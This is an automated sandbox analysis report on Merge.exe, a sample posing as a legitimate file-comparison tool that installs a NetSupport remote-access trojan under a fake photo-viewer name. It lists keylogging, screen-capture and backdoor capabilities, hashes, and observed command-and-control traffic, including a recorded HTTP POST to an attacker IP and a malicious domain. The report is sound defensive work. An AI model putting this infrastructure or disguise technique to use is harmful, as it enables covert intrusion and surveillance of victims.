Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Merge.exe

Overview

General Information

Sample name:Merge.exe
Analysis ID:1575379
MD5:d024ff2fc7acb7c172f0ba38a9fbc2c3
SHA1:fd79908540ba4abf2beeeb7e93705b8bd8c6609f
SHA256:113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1
Tags:AraxisMergeCYNCLIMITEDexenetsupportuser-NDA0E
Infos:

Detection

NetSupport RAT
Score:42
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:20
Range:0 - 100

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Contains functionalty to change the wallpaper
PE file has a writeable .text section
PE file has nameless sections
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
EXE planting / hijacking vulnerabilities found
Enables security privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64
  • Merge.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\Merge.exe" MD5: D024FF2FC7ACB7C172F0BA38A9FBC2C3)
    • DisplayPhotoViewer.exe (PID: 7172 cmdline: "C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe" MD5: F78F5CC0A0B3AF7AF5485BB47B4809C0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcichek.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 3 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000006.00000003.2951937785.000000000A642000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 57 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      6.2.DisplayPhotoViewer.exe.7e20000.2.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        6.3.DisplayPhotoViewer.exe.a703500.66.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          6.3.DisplayPhotoViewer.exe.a773a49.94.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            6.3.DisplayPhotoViewer.exe.a75d8e8.56.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              6.3.DisplayPhotoViewer.exe.a742b50.62.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 97 entries

                                Sigma Signatures

                                No Sigma rule has matched

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-15T11:50:17.359236+010028277451Malware Command and Control Activity Detected192.168.2.449899162.33.178.193443TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\zxing.dllReversingLabs: Detection: 13%
                                Multi AV Scanner detection for submitted file
                                Source: Merge.exeVirustotal: Detection: 19%Perma Link
                                Source: Merge.exeReversingLabs: Detection: 15%
                                Source: Merge.exe, 00000000.00000000.1850845816.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_68d76c61-8
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeEXE: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exeJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeEXE: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeJump to behavior

                                Compliance

                                barindex
                                Detected unpacking (creates a PE file in dynamic memory)
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeUnpacked PE file: 6.2.DisplayPhotoViewer.exe.9650000.3.unpack
                                EXE planting / hijacking vulnerabilities found
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeEXE: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exeJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeEXE: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeJump to behavior
                                Uses 32bit PE files
                                Source: Merge.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                PE / OLE file has a valid certificate
                                Source: Merge.exeStatic PE information: certificate valid
                                Uses new MSVCR Dlls
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\MSVCR100.dllJump to behavior
                                Contains modern PE file flags such as dynamic base (ASLR) or NX
                                Source: Merge.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Binary contains paths to debug symbols
                                Source: Binary string: msvcr100.i386.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3284744274.000000006C641000.00000020.00000001.01000000.00000019.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2635853467.000000000B06B000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2617292451.000000000A8A1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F\ctl32\Full\pcichek.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3287171368.000000006F912000.00000002.00000001.01000000.00000017.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdbP source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\htctl32.pdbL source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F\ctl32\Full\pcichek.pdbN source: DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: m\1201\1201\ctl32\release\pcicapi.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\tcctl32.pdbP source: DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950075179.000000000C2A1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2643241230.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\Projects\FreeImageSVN\FreeImage\trunk\Win32\Release\FreeImage.pdbGCTL source: DisplayPhotoViewer.exe, 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmp
                                Source: Binary string: pcicapi.pdbm\1201\1201\ctl32\release\pcicapi.pdbH source: DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\tcctl32.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950075179.000000000C2A1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2643241230.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A63B000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951937785.000000000A642000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2627011351.0000000007AED000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A624000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944484464.000000000A642000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3124698930.000000000A720000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935540782.000000000A642000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201\AudioCapture\Release\AudioCapture.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2616773901.0000000007AEE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\htctl32.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\Projects\FreeImageSVN\FreeImage\trunk\Win32\Release\FreeImage.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmp
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: z:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: x:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: v:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: t:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: r:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: p:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: n:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: l:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: j:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: h:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: f:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: b:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: y:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: w:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: u:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: s:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: q:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: o:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: m:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: k:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: i:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: g:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: e:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: c:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: a:Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11103360 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_11103360
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110619A0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_110619A0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1102BC80 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102BC80
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49899 -> 162.33.178.193:443
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                Source: Joe Sandbox ViewASN Name: CORENETUS CORENETUS
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: dirklend.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://162.33.178.193/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 162.33.178.193Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
